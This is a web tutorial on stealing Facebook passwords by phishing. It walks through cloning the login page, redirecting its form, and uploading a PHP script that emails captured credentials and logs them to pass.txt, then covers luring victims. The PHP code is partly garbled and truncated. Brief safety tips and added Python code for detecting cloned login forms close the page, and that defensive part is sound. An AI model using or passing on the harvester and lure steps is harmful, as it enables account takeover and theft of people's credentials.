What is Phishing? How to Hack Facebook Account Password with Phishing?

Phishing is a hacking technique in which a hacker sets up a fake website, usually a clone of a legitimate website, that looks genuine to a normal internet user. The hacker then uses social engineering to trick the target (someone specific, or unknown users in bulk) into logging in through this phishing website, so that the hacker can log and steal the target’s password and other important details.

Just for your information, phishing is a very successful hacking technique and, if done properly, works even on computer professionals and experts. In the phishing process, once the innocent user submits their details to the hacker (i.e. the phishing website), the victim is redirected to the original website and everything appears to work normally (because the phishing website submits the collected username and password to the original website, the victim logs in successfully and nothing seems to change for the victim at that time).

In this article I’m going to demonstrate how simple Facebook phishing is (with the help of a video) and how to protect yourself from phishing.

Hacking Facebook Account & Password using Phishing:

To demonstrate phishing we need two necessary things:

  1. A webhost or webserver where your fake pages (phishing websites) will be hosted.
  2. A phishing website itself that should have the capability to store facebook passwords.

First we’ll setup an account at some web hosting company. I will choose free web hosting and will then signup for a free account there. I have selected sub-domain (refer the video). Confirm the account via email verification and then move to next step.

Now visit to then make a right click on the facebook login page and click on “view page source”. You’ll get source code of facebook page then select all facebook code and copy it.

Visit to and download the notepad++ software and install it. Open notepad++ and paste all the copied facebook source code there. Now search for ‘action’ word in it and locate following lines:

<form id=”login_form” action=”” method=”post” onsubmit=”return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)”>

Change the above link to (replace “” with your own domain name) and save the file as index.htm.

Now following is the mail.php file, copy it and edit the links to your own domain name (actually replace them with full path of your phishing pages). Now the data (username, password and other details) entered by victim will be transferred to mail.php which will handle all the data and store it in pass.txt file for you (hacker).

header ('Location:');

$posts        = '';
foreach($_POST as $k => $v){
    $posts .= '$_POST['.$k.'] = '.$v."\n";

$posts  .= "------------------------------------------\n";
$emailto = '';
$from    = "";
$body        = '

@mail($emailto, $subject, $body, $from);
$handle = @fopen("pass.txt", "a+");
@fwrite($handle, $posts);

Now you both files (index.html and mail.php) are ready. Login to web hosting account and then go to cpanel and use file manager to upload these two files (refer to video).

Now your phishing website with capability to store password & other details are setup. Now it’s time for social engineering to trick you target to login to your phishing website. 

The Story: How Facebook account and password will be hacked?

When the target will visit your domain (phishing website) or you’ll trick the target to visit there, target will see facebook (actually, cloned website) hosted on your domain.

As usual, target will hopefully not notice the phishing website and will try to login into it. Then he will lose his facebook account password, how?

Facebook Phishing

After entering the username and password, when the target clicks the login button, the Facebook password and account details are sent to your mail.php file. The mail.php file creates a pass.txt file (if not already present) and then stores the passwords and other account details there.

The hacker logs in to the web hosting account later and reads the content of pass.txt (i.e. account details and passwords).

Hacking Facebook Account Password


(Unfortunately YouTube removed that video, but you can still find the transcript at and video at

TIPS to Stay Safe Against Phishing Attacks:

  1. Use a popular, up-to-date web browser such as Google Chrome, Mozilla Firefox, Apple Safari or Opera. They can easily detect phishing pages and websites (refer to video).
  2. Use a good antivirus (with additional anti-spyware and anti-adware protection), as these usually help detect and block phishing pages.
  3. Before logging into any website account, check the browser’s address bar to confirm the webpage address and the website’s location. Note: important websites use https:// instead of http:// (the ‘s’ can be read as “secure”) in the URL (e.g., , all banks’ websites etc.).
  4. Don’t visit webpages you don’t trust, or at least don’t submit important details such as username, account password, PIN and other credentials to them.
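
The address-bar check in tip 3, combined with the altered form action described earlier, can be automated on the defender's side, for example in a mail gateway or a browsing proxy. The Python below is an added example, not code from the original article: it flags a page whose password form is served from, or posts to, a host outside an allowlist. The allowlist, both sample pages and the host login-example.invalid are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

TRUSTED_HOSTS = {"facebook.com"}  # assumption: hosts accepted for this brand's login
# Constructed sample pages (not captured from any real site).
CLONE_URL = "http://login-example.invalid/index.htm"
CLONE_HTML = ('<form id="login_form" action="mail.php" method="post">'
              '<input name="email"><input type="password" name="pass"></form>')
GENUINE_URL = "https://www.facebook.com/login"
GENUINE_HTML = '<form action="/login" method="post"><input type="password" name="pass"></form>'

def host_trusted(host, trusted=TRUSTED_HOSTS):
    """True only for a trusted domain or a subdomain of one (no substring match)."""
    host = (host or "").lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in trusted)

class LoginFormFinder(HTMLParser):
    """Collects the action of every <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self._action = None        # action of the open form, None outside a form
        self.login_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action = a.get("action") or ""
        elif (tag == "input" and self._action is not None
              and (a.get("type") or "").lower() == "password"):
            self.login_actions.append(self._action)
            self._action = None    # record each form once

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None

def check_login_page(page_url, html):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    page = urlsplit(page_url)
    if page.scheme != "https":
        findings.append("page not served over https")
    if not host_trusted(page.hostname):
        findings.append(f"page host {page.hostname} is not a trusted login host")
    finder = LoginFormFinder()
    finder.feed(html)
    for action in finder.login_actions:
        target = urlsplit(urljoin(page_url, action))  # resolve relative actions
        if target.scheme != "https" or not host_trusted(target.hostname):
            findings.append(f"password form posts to {target.scheme}://{target.hostname}")
    return findings
```

Matching on the exact domain or a dot-prefixed subdomain matters: a host such as facebook.com.example.net contains the brand name but is not trusted by this check.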

